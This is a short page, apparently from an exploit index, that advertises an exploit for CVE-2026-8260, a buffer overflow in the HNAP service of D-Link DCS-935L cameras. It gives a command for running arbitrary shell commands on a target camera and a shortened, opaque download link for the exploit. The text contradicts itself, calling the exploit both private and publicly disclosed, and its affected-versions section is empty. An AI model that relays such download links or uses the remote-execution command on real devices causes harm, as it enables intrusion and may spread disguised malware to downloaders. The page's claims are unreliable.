Share
## https://sploitus.com/exploit?id=B25B21A0-851C-543E-941D-AEBFF74E7D88
# CVE-2026-8260

## Overview

A buffer overflow vulnerability affects the D-Link DCS-935L camera models running firmware versions up to 1.10.01.

## Details

- **CVE ID**: [CVE-2026-8260](https://nvd.nist.gov/vuln/detail/CVE-2026-8260)
- **Discovered**: 2026-05-11
- **Published**: 2026-05-11
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

The flaw exists in the SetDeviceSettings function of the HNAP Service, located at /web/cgi-bin/hnap/hnap_service. This vulnerability enables an attacker to manipulate the AdminPassword argument, potentially leading to remote code execution. An exploit has been publicly disclosed, posing significant risks for users of the affected devices.
## Affected Versions

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Exploit:
### [Download here](https://tinyurl.com/yv89jhtm)